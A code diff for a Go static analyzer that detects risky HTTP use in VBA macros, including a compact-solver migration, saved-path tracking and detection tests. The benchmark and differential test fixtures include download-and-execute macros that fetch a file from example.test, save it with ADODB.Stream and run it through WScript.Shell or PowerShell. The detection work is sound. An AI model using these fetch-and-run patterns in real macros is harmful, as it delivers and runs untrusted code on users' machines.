+	}
+	return states, nil
+}
+
+func transferHTTPEvidence(statement procedureir.Statement, state *httpEvidenceState, view semanticstate.StateView[httpScalar], e *httpCompactEnvironment) {
+	text := strings.TrimSpace(stripVBAFileComment(statement.Text))
+	if text == "" {
+		return
+	}
+	if match := httpObjectAssignmentRe.FindStringSubmatch(text); len(match) == 3 {
+		target, rhs := strings.ToLower(match[1]), strings.TrimSpace(match[2])
+		switch {
+		case httpKindFromConstruction(rhs) != httpUnknown:
+			identity := e.constructorIdentity(target, statement.ID)
+			if identity == "" {
+				identity = fmt.Sprintf("%s@%d", target, statement.ID)
+			}
+			state.objects[target] = identity
+			delete(state.unknown, target)
+			delete(state.sinks, target)
+		case state.objects[strings.ToLower(rhs)] != "" || state.unknown[strings.ToLower(rhs)]:
+			source := strings.ToLower(rhs)
+			state.objects[target] = state.objects[source]
+			state.unknown[target] = state.unknown[source]
+			state.sinks[target] = cloneHTTPIntSet(state.sinks[source])
+		case httpPartialNewMatches(e.object(view, target).kind, rhs):
+			// The IR may expose a typed `New ADODB`/`New MSXML2` prefix
+			// while the declaration carries the complete dotted type. Preserve
+			// the declaration identity and its sink witness in that case.
+		default:
+			delete(state.objects, target)
+			delete(state.unknown, target)
+			delete(state.sinks, target)
+		}
+	}
+	match := httpMemberCallRe.FindStringSubmatchIndex(text)
+	if match == nil {
+		return
+	}
+	receiver := strings.ToLower(text[match[2]:match[3]])
+	identity, present := state.objects[receiver]
+	if !present {
+		return
+	}
+	args := httpMethodArgs(text, match[1])
+	method := strings.ToLower(text[match[4]:match[5]])
+	credential := false
+	switch method {
+	case "open":
+		credential = len(args) > 3 && !httpCompactKnownEmpty(args[3], view, e) || len(args) > 4 && !httpCompactKnownEmpty(args[4], view, e)
+	case "setcredentials":
+		credential = true
+	case "setrequestheader":
+		if len(args) > 0 {
+			header, known := httpCompactConstantString(args[0], view, e)
+			credential = known && httpSensitiveHeaderRe.MatchString(strings.TrimSpace(header))
+		}
+	}
+	if !credential {
+		return
+	}
+	if state.unknown[receiver] || identity == "" {
+		if state.sinks[receiver] == nil {
+			state.sinks[receiver] = map[int]bool{}
+		}
+		state.sinks[receiver][statement.Range.StartByte] = true
+		return
+	}
+	for name, candidate := range state.objects {
+		if !state.unknown[name] && candidate == identity {
+			if state.sinks[name] == nil {
+				state.sinks[name] = map[int]bool{}
+			}
+			state.sinks[name][statement.Range.StartByte] = true
+		}
+	}
+}

--- a/internal/analyze/http_compact_state.go
+++ b/internal/analyze/http_compact_state.go
@@ -1089,11 +1089,21 @@ func httpCompactIsProcessLaunch(text string, view semanticstate.StateView[httpSc
 	if match == nil {
 		return false
 	}
-	dot := strings.Index(text, ".")
-	if dot < 0 {
+	// The match starts at the member-call dot. Scan backwards from that
+	// position so assignment-form calls such as `Set result = shell.Run ...`
+	// resolve the launcher receiver rather than the statement prefix.
+	end := match[0]
+	for end > 0 && (text[end-1] == ' ' || text[end-1] == '\t') {
+		end--
+	}
+	start := end
+	for start > 0 && isVBAIdentifierPart(text[start-1]) {
+		start--
+	}
+	if start == end {
 		return false
 	}
-	receiver := strings.ToLower(strings.TrimSpace(text[:dot]))
+	receiver := strings.ToLower(text[start:end])
 	matchedCall := strings.ToLower(text[match[0]:match[1]])
 	method := ""
 	for _, candidate := range []string{"shellexecute", "exec", "run"} {

--- a/internal/analyze/http_compact_state.go
+++ b/internal/analyze/http_compact_state.go
@@ -24,7 +24,10 @@ const (
 	httpCompactValueSlot
 	httpCompactSensitiveSlot
 	httpCompactSavedSlot
+	httpCompactSavedSetSlot
 )
+
+const httpSavedPathSetSeparator = "\x00"
 
 // httpScalar is deliberately map-free.  Its strings are immutable values
 // shared by the revision; Clone is therefore a plain value copy.
@@ -68,6 +71,7 @@ type httpCompactEnvironment struct {
 	sensitive map[string]httpCompactSlot
 	saved     map[string][]httpCompactSlot
 	savedPath map[string][]httpCompactSlot
+	savedSet  map[string]httpCompactSlot
 	saveVars  map[string]bool
 	savePaths []string
 
@@ -124,6 +128,17 @@ func (httpScalarLattice) Join(dst *httpScalar, src httpScalar) bool {
 		merged.flag = (dst.present && dst.flag) || (src.present && src.flag)
 	case httpCompactSavedSlot:
 		merged.present = dst.present && src.present && dst.text == src.text
+		if !merged.present {
+			merged.text = ""
+		}
+	case httpCompactSavedSetSlot:
+		if !dst.present || !src.present {
+			merged.present = false
+			merged.text = ""
+			break
+		}
+		merged.text = httpCompactSavedPathSetIntersect(dst.text, src.text)
+		merged.present = merged.text != ""
 		if !merged.present {
 			merged.text = ""
 		}
@@ -315,10 +330,11 @@ func buildHTTPCompactEnvironment(file parsedFile, proc sourceProcedure, initial 
 	}
 	sort.Strings(savePaths)
 
-	names := make([]string, 0, len(vars)*4+len(saveVars)*(len(saveSites)+len(savePaths)))
+	names := make([]string, 0, len(vars)*4+len(saveVars)*(1+len(saveSites)+len(savePaths)))
 	for _, variable := range vars {
 		names = append(names, "object:"+variable, "launcher:"+variable, "value:"+variable, "sensitive:"+variable)
 		if saveVars[variable] {
+			names = append(names, "saved-set:"+variable)
 			for _, site := range saveSites {
 				names = append(names, fmt.Sprintf("saved:%s:%d", variable, site))
 			}
@@ -332,17 +348,18 @@ func buildHTTPCompactEnvironment(file parsedFile, proc sourceProcedure, initial 
 		variables: vars, saveSites: saveSites, names: names, initial: initial,
 		objects: map[string]httpCompactSlot{}, launchers: map[string]httpCompactSlot{},
 		values: map[string]httpCompactSlot{}, sensitive: map[string]httpCompactSlot{},
-		saved: map[string][]httpCompactSlot{}, savedPath: map[string][]httpCompactSlot{}, saveVars: saveVars, savePaths: savePaths, identityByKey: identityByKey,
+		saved: map[string][]httpCompactSlot{}, savedPath: map[string][]httpCompactSlot{}, savedSet: map[string]httpCompactSlot{}, saveVars: saveVars, savePaths: savePaths, identityByKey: identityByKey,
 	}, semanticstate.NewEnvironment(names, names)
 }
 
 // httpCompactProcedureStringCandidates is a pre-scan used only to allocate
 // saved-path symbols. It gathers literal and module-constant values assigned
-// to procedure-local names, retaining all values seen across branches so that
-// a later SaveToFile site has a stable path slot even when its path is not
-// available in the entry state. Candidate truncation is intentionally not
-// allowed here: every retained path is a semantic symbol, and dropping one
-// would make a later download-and-execute finding depend on enumeration order.
+// to procedure-local names, retaining values seen across branches so that a
+// later SaveToFile site has a stable path slot even when its path is not
+// available in the entry state. The bounded exact-path slots are supplemented
+// by one scalar saved-path set per stream; that fallback preserves paths that
+// do not fit in the bounded Cartesian product without putting an unbounded
+// allocation on the environment-building path.
 func httpCompactProcedureStringCandidates(proc sourceProcedure, initial httpAnalysisState) map[string]map[string]bool {
 	values := map[string]map[string]bool{}
 	for name, value := range initial.strings {
@@ -396,6 +413,7 @@ func httpCompactStringCandidates(expr string, values map[string]map[string]bool)
 		return nil
 	}
 	candidates := []string{""}
+	const maxCandidates = 64
 	for _, rawPart := range parts {
 		part := strings.TrimSpace(rawPart)
 		var pieces []string
@@ -411,20 +429,87 @@ func httpCompactStringCandidates(expr string, values map[string]map[string]bool)
 		if len(pieces) == 0 {
 			return nil
 		}
-		// Do not cap the Cartesian product. The result is used to allocate the
-		// immutable saved-path symbols, so a cap would silently discard a
-		// statically possible executable path. The fixed-point state itself
-		// remains scalar; this pre-scan only materializes the finite candidates
-		// that the source actually provides.
-		next := make([]string, 0, len(candidates)*len(pieces))
+		// Keep the eagerly indexed exact-path symbols bounded. Any path that is
+		// not represented here is retained by the scalar saved-path set updated
+		// by the transfer, so this cap cannot make a finding unsound.
+		capacity := maxCandidates
+		if len(candidates) <= maxCandidates && len(pieces) <= maxCandidates {
+			capacity = len(candidates) * len(pieces)
+			if capacity > maxCandidates {
+				capacity = maxCandidates
+			}
+		}
+		next := make([]string, 0, capacity)
 		for _, prefix := range candidates {
 			for _, piece := range pieces {
+				if len(next) == maxCandidates {
+					break
+				}
 				next = append(next, prefix+piece)
+			}
+			if len(next) == maxCandidates {
+				break
 			}
 		}
 		candidates = next
 	}
 	return candidates
+}
+
+// Saved-path overflow is represented as a sorted, NUL-separated scalar. NUL
+// cannot occur in a Windows path, so the representation remains unambiguous
+// while keeping the semantic slot map-free. The set is unioned by transfer
+// (multiple SaveToFile operations) and intersected by the lattice (branch
+// joins), matching the legacy savedExecutable semantics.
+func httpCompactSavedPathSetAdd(encoded, path string) string {
+	path = httpPathKey(path)
+	if path == "" {
+		return encoded
+	}
+	if encoded == "" {
+		return path
+	}
+	paths := strings.Split(encoded, httpSavedPathSetSeparator)
+	index := sort.SearchStrings(paths, path)
+	if index < len(paths) && paths[index] == path {
+		return encoded
+	}
+	paths = append(paths, "")
+	copy(paths[index+1:], paths[index:])
+	paths[index] = path
+	return strings.Join(paths, httpSavedPathSetSeparator)
+}
+
+func httpCompactSavedPathSetIntersect(left, right string) string {
+	if left == "" || right == "" {
+		return ""
+	}
+	leftPaths := strings.Split(left, httpSavedPathSetSeparator)
+	rightPaths := strings.Split(right, httpSavedPathSetSeparator)
+	common := make([]string, 0, len(leftPaths))
+	leftIndex, rightIndex := 0, 0
+	for leftIndex < len(leftPaths) && rightIndex < len(rightPaths) {
+		switch {
+		case leftPaths[leftIndex] < rightPaths[rightIndex]:
+			leftIndex++
+		case leftPaths[leftIndex] > rightPaths[rightIndex]:
+			rightIndex++
+		default:
+			common = append(common, leftPaths[leftIndex])
+			leftIndex++
+			rightIndex++
+		}
+	}
+	return strings.Join(common, httpSavedPathSetSeparator)
+}
+
+func httpCompactSavedPathSetMatches(encoded, command string) bool {
+	for _, path := range strings.Split(encoded, httpSavedPathSetSeparator) {
+		if command == path || httpCommandContainsPath(command, path) {
+			return true
+		}
+	}
+	return false
 }
 
 func (e *httpCompactEnvironment) bind(environment semanticstate.Environment) {
@@ -444,6 +529,9 @@ func (e *httpCompactEnvironment) bind(environment semanticstate.Environment) {
 		if !e.saveVars[variable] {
 			continue
 		}
+		setName := "saved-set:" + variable
+		setID, _ := environment.Symbol(setName)
+		e.savedSet[variable] = httpCompactSlot{id: setID, name: setName, variable: variable, class: httpCompactSavedSetSlot}
 		for _, site := range e.saveSites {
 			name := fmt.Sprintf("saved:%s:%d", variable, site)
 			id, _ := environment.Symbol(name)
@@ -463,6 +551,9 @@ func (e *httpCompactEnvironment) seed(state *semanticstate.State[httpScalar]) {
 		state.Set(e.launchers[variable].id, httpScalarZero(httpCompactLauncherSlot))
 		state.Set(e.values[variable].id, httpScalarZero(httpCompactValueSlot))
 		state.Set(e.sensitive[variable].id, httpScalarZero(httpCompactSensitiveSlot))
+		if slot, ok := e.savedSet[variable]; ok {
+			state.Set(slot.id, httpScalarZero(httpCompactSavedSetSlot))
+		}
 		for _, slot := range e.saved[variable] {
 			state.Set(slot.id, httpScalarZero(httpCompactSavedSlot))
 		}
@@ -514,6 +605,11 @@ func (e *httpCompactEnvironment) object(view semanticstate.StateView[httpScalar]
 }
 
 func (e *httpCompactEnvironment) copySaved(view semanticstate.StateView[httpScalar], out *semanticstate.State[httpScalar], from, to string) {
+	if fromSlot, ok := e.savedSet[from]; ok {
+		if toSlot, ok := e.savedSet[to]; ok {
+			httpCompactSet(out, toSlot, httpCompactValue(view, fromSlot))
+		}
+	}
 	for index, slot := range e.saved[from] {
 		if index < len(e.saved[to]) {
 			httpCompactSet(out, e.saved[to][index], httpCompactValue(view, slot))
@@ -527,6 +623,9 @@ func (e *httpCompactEnvironment) copySaved(view semanticstate.StateView[httpScal
 }
 
 func (e *httpCompactEnvironment) clearSaved(out *semanticstate.State[httpScalar], variable string) {
+	if slot, ok := e.savedSet[variable]; ok {
+		httpCompactSet(out, slot, httpScalarZero(httpCompactSavedSetSlot))
+	}
 	for _, slot := range e.saved[variable] {
 		httpCompactSet(out, slot, httpScalarZero(httpCompactSavedSlot))
 	}
@@ -559,6 +658,11 @@ func (e *httpCompactEnvironment) setObjectAliases(view semanticstate.StateView[h
 			for index, saved := range e.savedPath[receiver] {
 				if index < len(e.savedPath[name]) {
 					httpCompactSet(out, e.savedPath[name][index], httpCompactValue(view, saved))
+				}
+			}
+			if saved, ok := e.savedSet[receiver]; ok {
+				if target, ok := e.savedSet[name]; ok {
+					httpCompactSet(out, target, httpCompactValue(view, saved))
 				}
 			}
 		}
@@ -912,6 +1016,12 @@ func httpCompactTransfer(file parsedFile, proc sourceProcedure, statement proced
 						}
 					}
 				}
+				if !matched {
+					if savedSlot, ok := e.savedSet[name]; ok {
+						saved := httpCompactValue(output.View(), savedSlot)
+						matched = saved.present && httpCompactSavedPathSetMatches(saved.text, launchKey)
+					}
+				}
 				if matched {
 					findings = append(findings, httpFindingSpec{line: line, code: "VBA246", api: "ADODB.Stream", risk: "download_and_execute", redact: true})
 				}
@@ -1029,6 +1139,11 @@ func httpCompactTransfer(file parsedFile, proc sourceProcedure, statement proced
 					}
 				}
 				canonicalPath := httpPathKey(path)
+				if slot, ok := e.savedSet[receiver]; ok {
+					saved := httpCompactValue(output.View(), slot)
+					encoded := httpCompactSavedPathSetAdd(saved.text, canonicalPath)
+					httpCompactSet(output, slot, httpScalar{class: httpCompactSavedSetSlot, present: encoded != "", text: encoded})
+				}
 				for _, slot := range e.savedPath[receiver] {
 					if slot.path == canonicalPath {
 						httpCompactSet(output, slot, httpScalar{class: httpCompactSavedSlot, present: true, text: canonicalPath})
@@ -1247,6 +1362,9 @@ func transferHTTPEvidence(statement procedureir.Statement, state *httpEvidenceSt
 	}
 	if match := httpObjectAssignmentRe.FindStringSubmatch(text); len(match) == 3 {
 		target, rhs := strings.ToLower(match[1]), strings.TrimSpace(match[2])
+		sourceName := strings.ToLower(rhs)
+		sourceObject := e.object(view, sourceName)
+		sourceKnown := sourceObject.present && sourceObject.kind != httpUnknown
 		switch {
 		case httpKindFromConstruction(rhs) != httpUnknown:
 			identity := e.constructorIdentity(target, statement.ID)
@@ -1256,10 +1374,24 @@ func transferHTTPEvidence(statement procedureir.Statement, state *httpEvidenceSt
 			state.objects[target] = identity
 			delete(state.unknown, target)
 			delete(state.sinks, target)
-		case state.objects[strings.ToLower(rhs)] != "" || state.unknown[strings.ToLower(rhs)]:
-			source := strings.ToLower(rhs)
-			state.objects[target] = state.objects[source]
-			state.unknown[target] = state.unknown[source]
+		case state.objects[sourceName] != "" || state.unknown[sourceName] || sourceKnown:
+			source := sourceName
+			identity := state.objects[source]
+			unknown := state.unknown[source]
+			// The compact semantic state treats a known-kind object with an
+			// uncertain identity as an alias of its source name. Mirror that
+			// refinement in the evidence replay so credential-sink ownership
+			// follows the same alias chain after a branch join.
+			if sourceKnown && identity == "" {
+				identity = source
+				unknown = false
+			}
+			state.objects[target] = identity
+			if unknown {
+				state.unknown[target] = true
+			} else {
+				delete(state.unknown, target)
+			}
 			state.sinks[target] = cloneHTTPIntSet(state.sinks[source])
 		case httpPartialNewMatches(e.object(view, target).kind, rhs):
 			// The IR may expose a typed `New ADODB`/`New MSXML2` prefix

--- a/internal/analyze/http_transport.go
+++ b/internal/analyze/http_transport.go
@@ -11,7 +11,6 @@ import (
 	"strconv"
 	"strings"
 
-	"github.com/harumiWeb/xlflow/internal/analyze/semanticstate"
 	"github.com/harumiWeb/xlflow/internal/config"
 	vbacfg "github.com/harumiWeb/xlflow/internal/vba/cfg"
 	"github.com/harumiWeb/xlflow/internal/vba/procedureir"
@@ -93,7 +92,7 @@ func (a Analyzer) httpTransportFindingsContext(ctx context.Context, file parsedF
 		return nil, nil
 	}
 	initial := newHTTPAnalysisState(file, ir)
-	entryStates, err := solveHTTPStates(ctx, a, file, proc, *proc.Graph, initial)
+	compact, err := solveHTTPStates(ctx, a, file, proc, *proc.Graph, initial)
 	if err != nil {
 		return nil, err
 	}
@@ -107,11 +106,11 @@ func (a Analyzer) httpTransportFindingsContext(ctx context.Context, file parsedF
 		if block.Statement == nil || block.Statement.Recovered {
 			continue
 		}
-		state, ok := entryStates[block.ID]
-		if !ok {
+		input := compact.entryState(block.ID)
+		if !input.valid {
 			continue
 		}
-		_, found := a.transferHTTPStatement(file, proc, *block.Statement, state, true)
+		found := compact.collect(file, proc, *block.Statement, input.view)
 		specs = append(specs, found...)
 	}
 	// Module constants are storage findings under VBA223. VBA246 reports the
@@ -195,86 +194,8 @@ func httpRecordConstant(state *httpAnalysisState, name, expression string) {
 	}
 }
 
-func solveHTTPStates(ctx context.Context, a Analyzer, file parsedFile, proc sourceProcedure, graph vbacfg.Graph, initial httpAnalysisState) (map[vbacfg.BlockID]httpAnalysisState, error) {
-	// Keep the existing HTTP state as the domain value at one indexed slot. The
-	// solver owns scheduling, edge classification, cancellation, and snapshot
-	// isolation; the adapter preserves the established transfer/join semantics
-	// while the HTTP domain is incrementally migrated to scalar slots.
-	view := graph.View(vbacfg.EdgeFilter{})
-	index, err := semanticstate.NewIndexView(view)
-	if err != nil {
-		return nil, err
-	}
-	environment := semanticstate.NewEnvironment([]string{"http-state"}, []string{"http-state"})
-	const lane semanticstate.LaneOrdinal = 0
-	var symbol semanticstate.SymbolID
-	lattice := httpStateLattice{}
-	solver, err := semanticstate.NewSolver(index, environment, lattice, []semanticstate.Lane[httpAnalysisState]{
-		{
-			Initialize: func(_ context.Context, _ semanticstate.LaneOrdinal, state *semanticstate.State[httpAnalysisState]) error {
-				state.Set(symbol, cloneHTTPState(initial))
-				return nil
-			},
-			// HTTP has no edge-specific refinement. Keep the adapter on the
-			// explicit policy path while documenting that every edge propagates.
-			EdgeDecision: func(_ context.Context, _ semanticstate.LaneOrdinal, _ semanticstate.Edge, _, _ semanticstate.StateView[httpAnalysisState], _ *semanticstate.State[httpAnalysisState]) (semanticstate.EdgeDisposition, error) {
-				return semanticstate.EdgePropagate, nil
-			},
-			Transfer: func(_ context.Context, _ semanticstate.LaneOrdinal, block semanticstate.BlockOrdinal, input semanticstate.StateView[httpAnalysisState], output *semanticstate.State[httpAnalysisState]) error {
-				value, ok := input.Value(symbol)
-				if !ok {
-					return nil
-				}
-				_, ok = index.Block(block)
-				if !ok {
-					return nil
-				}
-				candidate, ok := view.BlockAtOrdinal(vbacfg.BlockOrdinal(block))
-				if !ok || candidate.Statement == nil || candidate.Statement.Recovered {
-					output.Set(symbol, value)
-					return nil
-				}
-				value, _ = a.transferHTTPStatement(file, proc, *candidate.Statement, value, false)
-				output.Set(symbol, value)
-				return nil
-			},
-		},
-	})
-	if err != nil {
-		return nil, err
-	}
-	result, err := solver.SolveContext(ctx)
-	if err != nil {
-		return nil, err
-	}
-	states := make(map[vbacfg.BlockID]httpAnalysisState, index.BlockCount())
-	for _, block := range index.Blocks() {
-		value, ok := result.State(block.Ordinal, lane).Value(symbol)
-		if ok {
-			states[block.ID] = value
-		}
-	}
-	return states, nil
-}
-
-// httpStateLattice adapts the legacy HTTP state join to the indexed solver.
-// Clone is the alias-safety boundary for the nested evidence sets still used
-// by the HTTP domain during this migration step.
-type httpStateLattice struct{}
-
-func (httpStateLattice) Clone(value httpAnalysisState) httpAnalysisState {
-	return cloneHTTPState(value)
-}
-
-func (httpStateLattice) Join(dst *httpAnalysisState, src httpAnalysisState) bool {
-	if dst == nil {
-		return false
-	}
-	merged, changed := joinHTTPState(*dst, src, true)
-	if changed {
-		*dst = merged
-	}
-	return changed
+func solveHTTPStates(ctx context.Context, a Analyzer, file parsedFile, proc sourceProcedure, graph vbacfg.Graph, initial httpAnalysisState) (*httpCompactSolve, error) {
+	return solveHTTPCompactStates(ctx, a, file, proc, graph, initial)
 }
 
 func (a Analyzer) transferHTTPStatement(file parsedFile, proc sourceProcedure, statement procedureir.Statement, state httpAnalysisState, collect bool) (httpAnalysisState, []httpFindingSpec) {

--- a/internal/analyze/http_transport_benchmark_test.go
+++ b/internal/analyze/http_transport_benchmark_test.go
@@ -1,0 +1,131 @@
+package analyze
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/harumiWeb/xlflow/internal/config"
+	vbaast "github.com/harumiWeb/xlflow/internal/vba/ast"
+	vbacfg "github.com/harumiWeb/xlflow/internal/vba/cfg"
+	"github.com/harumiWeb/xlflow/internal/vba/procedureir"
+)
+
+// BenchmarkHTTPAnalysisKernel keeps HTTP-only allocation measurements small
+// enough to run repeatedly while still exercising the fixed-point shapes that
+// previously amplified cloneHTTPState and joinHTTPState.
+func BenchmarkHTTPAnalysisKernel(b *testing.B) {
+	fixtures := []struct {
+		name   string
+		source string
+	}{
+		{name: "linear", source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    request.Open "GET", "https://example.test", False
+    request.SetTimeouts 1000, 1000, 1000, 1000
+    request.Send
+End Sub
+`},
+		{name: "branch-loop-alias", source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run(ByVal configure As Boolean)
+    Dim request As Object
+    Dim aliasRequest As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Set aliasRequest = request
+    If configure Then
+        aliasRequest.SetTimeouts 1000, 1000, 1000, 1000
+    End If
+    Do While configure
+        request.Open "GET", "https://example.test", False
+        request.Send
+        Exit Do
+    Loop
+End Sub
+`},
+		{name: "wide-constants", source: `Attribute VB_Name = "Main"
+Option Explicit
+Private Const BaseURL As String = "https://example.test/"
+Private Const PathPart As String = "resource"
+Public Sub Run()
+    Dim request As Object
+    Dim target As String
+    target = BaseURL & PathPart
+    Set request = CreateObject("MSXML2.ServerXMLHTTP.6.0")
+    request.Open "GET", target, False
+    request.Send
+End Sub
+`},
+		{name: "download-execute", source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Dim stream As Object
+    Dim shell As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Set stream = CreateObject("ADODB.Stream")
+    Set shell = CreateObject("WScript.Shell")
+    request.Open "GET", "https://example.test/tool.exe", False
+    request.Send
+    stream.Write request.ResponseBody
+    stream.SaveToFile "tool.exe", 2
+    shell.Run "tool.exe"
+End Sub
+`},
+	}
+	for _, fixture := range fixtures {
+		fixture := fixture
+		b.Run(fixture.name, func(b *testing.B) {
+			root := b.TempDir()
+			moduleDir := filepath.Join(root, "src", "modules")
+			if err := os.MkdirAll(moduleDir, 0o755); err != nil {
+				b.Fatal(err)
+			}
+			if err := os.WriteFile(filepath.Join(moduleDir, "Main.bas"), []byte(fixture.source), 0o644); err != nil {
+				b.Fatal(err)
+			}
+			file, proc := loadHTTPBenchmarkProcedure(b, root, fixture.source)
+			cfg := config.Default()
+			analyzer := Analyzer{RootDir: root, Config: cfg}
+			b.ReportAllocs()
+			b.ResetTimer()
+			for i := 0; i < b.N; i++ {
+				if _, err := analyzer.httpTransportFindingsContext(context.Background(), file, proc); err != nil {
+					b.Fatalf("HTTP fixture %s: %v", fixture.name, err)
+				}
+			}
+		})
+	}
+}
+
+func loadHTTPBenchmarkProcedure(b *testing.B, root, source string) (parsedFile, sourceProcedure) {
+	b.Helper()
+	path := filepath.Join(root, "src", "modules", "Main.bas")
+	doc, err := vbaast.ParseDocument(path, []byte(source))
+	if err != nil {
+		b.Fatal(err)
+	}
+	defer doc.Close()
+	ir, err := procedureir.BuildParsed(procedureir.BuildOptions{RootDir: root, Path: path, ModuleKind: "standard"}, doc)
+	if err != nil {
+		b.Fatal(err)
+	}
+	flow := vbacfg.BuildDocument(ir)
+	procedures := sourceProceduresFromIRRef(&ir, flow)
+	file := parsedFile{Path: path, Module: ir.ModuleName, ModuleKind: "standard", Source: []byte(source), Lines: normalizedSourceLines(source), IR: ir, CFG: flow, Procedures: procedures}
+	file.ModuleFacts = buildModuleAnalysisFacts(file.Lines, file.IR, file.Procedures)
+	for index := range file.Procedures {
+		file.Procedures[index].ModuleFacts = file.ModuleFacts
+	}
+	for _, proc := range file.Procedures {
+		if proc.Name == "Run" {
+			return file, proc
+		}
+	}
+	b.Fatal("Run procedure not found")
+	return parsedFile{}, sourceProcedure{}
+}

--- a/internal/analyze/http_transport_differential_test.go
+++ b/internal/analyze/http_transport_differential_test.go
@@ -1,0 +1,309 @@
+package analyze
+
+import (
+	"context"
+	"fmt"
+	"os"
+	"path/filepath"
+	"sort"
+	"testing"
+
+	"github.com/harumiWeb/xlflow/internal/config"
+	vbaast "github.com/harumiWeb/xlflow/internal/vba/ast"
+	vbacfg "github.com/harumiWeb/xlflow/internal/vba/cfg"
+	"github.com/harumiWeb/xlflow/internal/vba/procedureir"
+)
+
+// TestHTTPCompactMatchesPreMigrationTransfer compares the compact solver with
+// the pre-#713 map worklist kept only in this test oracle. The historical
+// #713 baseline revision was 6c9f8ba60c5b162cb7115e8e68744412c7de9d5d; the
+// oracle intentionally stays in the test package so production never pays for
+// the compatibility state or its map clones.
+func TestHTTPCompactMatchesPreMigrationTransfer(t *testing.T) {
+	fixtures := []struct {
+		name   string
+		source string
+	}{
+		{
+			name: "tls-and-timeout",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    request.SetTimeouts 1000, 1000, 1000, 1000
+    request.Option(4) = &H3300&
+    request.Open "GET", "https://example.test", False
+    request.Send
+End Sub
+`,
+		},
+		{
+			name: "aliases-and-credentials",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Dim aliasRequest As Object
+    Set request = CreateObject("MSXML2.ServerXMLHTTP.6.0")
+    Set aliasRequest = request
+    aliasRequest.Open "GET", "http://example.test", False
+    request.SetRequestHeader "Authorization", "Bearer token-value"
+    aliasRequest.Send
+End Sub
+`,
+		},
+		{
+			name: "typed-new-prefix",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As MSXML2.ServerXMLHTTP60
+    Set request = New MSXML2.ServerXMLHTTP60
+    request.Open "GET", "http://example.test", False, "user", "password"
+    request.Send
+End Sub
+`,
+		},
+		{
+			name: "branch-unknown-timeout",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run(ByVal configure As Boolean)
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    If configure Then request.SetTimeouts 1000, 1000, 1000, 1000
+    request.Open "GET", "https://example.test", False
+    request.Send
+End Sub
+`,
+		},
+		{
+			name: "module-sensitive-header",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Private Const HEADER_NAME As String = "Authorization"
+Private Const AUTH_VALUE As String = "Bearer module-token"
+Public Sub Run()
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    request.SetTimeouts 1000, 1000, 1000, 1000
+    request.Open "GET", "https://example.test", False
+    request.SetRequestHeader HEADER_NAME, AUTH_VALUE
+    request.Send
+End Sub
+`,
+		},
+		{
+			name: "download-execute-alias",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Const target As String = "C:\Temp\payload.ps1"
+    Dim request As Object
+    Dim stream As ADODB.Stream
+    Dim aliasStream As ADODB.Stream
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    request.SetTimeouts 1000, 1000, 1000, 1000
+    request.Open "GET", "https://example.test/payload", False
+    request.Send
+    Set stream = New ADODB.Stream
+    Set aliasStream = stream
+    aliasStream.Write request.ResponseBody
+    aliasStream.SaveToFile target, 2
+    Shell "powershell.exe -File " & target
+End Sub
+`,
+		},
+		{
+			name: "unknown-reassignment",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run(ByVal replaceRequest As Boolean)
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    If replaceRequest Then Set request = New Collection
+    request.Open "GET", "http://example.test", False, "user", "password"
+    request.Send
+End Sub
+`,
+		},
+		{
+			name: "conflicting-object-kind",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run(ByVal useWinHTTP As Boolean)
+    Dim first As Object
+    Dim second As Object
+    Dim target As Object
+    If useWinHTTP Then
+        Set first = CreateObject("WinHttp.WinHttpRequest.5.1")
+    Else
+        Set first = CreateObject("MSXML2.ServerXMLHTTP.6.0")
+    End If
+    Set second = first
+    Set target = second
+    target.Open "GET", "http://example.test", False, "user", "password"
+    target.Send
+End Sub
+`,
+		},
+		{
+			name: "exceptional-timeout",
+			source: `Attribute VB_Name = "Main"
+Option Explicit
+Public Sub Run()
+    Dim request As Object
+    Set request = CreateObject("WinHttp.WinHttpRequest.5.1")
+    On Error GoTo TimeoutFailed
+    request.SetTimeouts 1000, 1000, 1000, 1000
+    Exit Sub
+TimeoutFailed:
+    request.Open "GET", "https://example.test", False
+    request.Send
+End Sub
+`,
+		},
+	}
+	for _, fixture := range fixtures {
+		fixture := fixture
+		t.Run(fixture.name, func(t *testing.T) {
+			dir := t.TempDir()
+			file, proc := loadHTTPDifferentialProcedure(t, dir, fixture.source)
+			analyzer := Analyzer{RootDir: dir, Config: config.Default()}
+			compact, err := analyzer.httpTransportFindingsContext(context.Background(), file, proc)
+			if err != nil {
+				t.Fatal(err)
+			}
+			legacy := legacyHTTPFindings(analyzer, file, proc)
+			if got, want := httpFindingDigest(compact), httpFindingDigest(legacy); !sameStringSlice(got, want) {
+				t.Fatalf("compact/pre-migration digest differs:\n compact=%#v\n legacy=%#v", got, want)
+			}
+		})
+	}
+}
+
+func loadHTTPDifferentialProcedure(t *testing.T, dir, source string) (parsedFile, sourceProcedure) {
+	t.Helper()
+	path := filepath.Join(dir, "src", "modules", "Main.bas")
+	if err := os.MkdirAll(filepath.Dir(path), 0o755); err != nil {
+		t.Fatal(err)
+	}
+	if err := os.WriteFile(path, []byte(source), 0o644); err != nil {
+		t.Fatal(err)
+	}
+	doc, err := vbaast.ParseDocument(path, []byte(source))
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer doc.Close()
